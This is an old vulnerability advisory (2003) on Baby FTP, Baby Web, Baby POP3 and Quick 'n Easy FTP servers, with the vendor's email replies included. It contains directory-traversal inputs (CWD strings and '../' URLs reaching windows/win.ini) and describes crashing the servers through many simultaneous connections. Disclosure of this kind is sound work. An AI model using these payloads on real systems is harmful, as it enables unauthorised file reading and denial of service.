In this advisorie there are some vulnerabilities i found yesterday for BabyFtp server,Baby web server,Baby Pop3 server and Quick n' easy Ftp. I informed the Company about these vulnerabilities and here are the e-mails they sent me: ----------------------------------------------------------------- From pablovandermeer@kabelfoon.nl Wed May 28 21 : 42:08 2003 Return-Path : Received : from cardassian.kabelfoon.nl (cardassian.kabelfoon.nl [62.45.45.18]) by localhost.localdomain (8.12.8/8.12.8) with ESMTP id h4SIg6KH025510 for ; Wed, 28 May 2003 21:42:07 +0300 Received : from PABLO (kf-nawij-tg01-0881.dial.kabelfoon.nl [62.45.131.114]) by cardassian.kabelfoon.nl (Postfix) with SMTP id EFAF8BE9F0 for ; Wed, 28 May 2003 20:39:21 +0200 (CEST) Message-ID : <000f01c32548$73cf3be0$0100a8c0@PABLO> From : "Pablo" To : xxxxxx xxxxxxx References : <200305281812.h4SICUvC016027@localhost.localdomain> Θέμα : Re: Multiple Vulnerabilities Found :) Date : Wed, 28 May 2003 20:39:20 +0200 MIME-Version : 1.0 Content-Type : text/plain; charset="iso-8859-7" Content-Transfer-Encoding : 8bit X-Priority : 3 X-MSMail-Priority : Normal X-Mailer : Microsoft Outlook Express 6.00.2800.1106 Disposition-Notification-To : "Pablo" X-MimeOLE : Produced By Microsoft MimeOLE V6.00.2800.1106 Hi, Thanks you very much for your report. First let me say that BabyFtp server, Baby web server, Baby Pop3 server are NOT real products but just (MFC) sample applications! They contain even more bugs than you can think of... As for Quick 'n Easy FTP server: can you make more connections than configured in 'Max connections' settings? If so how did you manage to do that? Regards, Pablo Ok, thanks! It looks like this is related to the size of physical memory, when new sockets are created in virtual memory it will crash the application... :( I will take a look at it first thing tomorrow morning. Regards and keep on hacking... Pablo ------------------------------------------ Baby FTP 1.2 Multiple Vulnerabilities. ------------------------------------------- Release Date: MAY 28, 2003 Systems Affected: BAby Ftp server Version 1.2 Description: While i was testing Baby Ftp Server last night i found some vulnerabilities. Let's take a look at the following: 1)The ftp server is vulnerable to directory traversal attack. A remote user can see the whole hard disk by supplying some strange cwd commands. 2)There is also a DOS attack.if you try to establish multiple connections from the same host on baby Ftp server it will crash. Let's Dance (Exploit) -------------------- (1) You need to supply these CWD commands for a succesful attack: CWD ... CWD /... CWD /...... CWD \... CWD ...\ CWD .../ (2) Let's try to establish about 100 connections with the webserver from the same IP: 1 220 Welcome to Baby Ftp server 2 220 Welcome to Baby Ftp server 3 220 Welcome to Baby Ftp server . . . . 67 220 Welcome to Baby Ftp server b00m..crash:> The error message will be: "Unhanled exception(MFC42.DLL):0xC00000005:Access Violation ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Quick n' easy FTP server 1.7 DOS ATTACK --------------------------------------- Systems Affected: Quick n' easy FTP server 1.7 Description: ------------ There is one D0s attack (yes again!) in Quick n' easy FTP server 1.7. By making a big numer of connections you can crash the server:> Exploit: -------- The same as above...try to establish a big number of connections using the same Ip and the server will crash. BABY web server 1.5 Multiple bugs --------------------------------------- Systems Affected: BAby Web server 1.5 Description: ------------ While i was checking Baby web server version 1.5 i found some stupid bugs.The first is a directory traversal bug and the second a Dos attack.Let's find out what is going on! Exploit: -------- (1)You can read whatever you want on the remote server by supplying some /.././ on you Web browser: http://[server]/../../../../windows/win.ini http://[server]\..\..\..\windows/win.ini etc..etc..etc... (2) By supplying again a very big number of connections the web server will crash:) It seems that all the products of www.pablovandermeer.nl have the same problem. BABY Pop3 server Version 1.0 DOS attack --------------------------------------- Systems Affected: BABY Pop3 server version 1.0 Description: ------------ There is the same Dos vulnerability here:P You can crash the server by supplying multiple connections from the same host. ----------------------------------------------- vulnerabilities found and tested by dr_insane ----------------------------------------------- Feedback --------- Please send suggestions and Comments to: dr_insane@hack.gr http://members.lycos.co.uk/r34ct/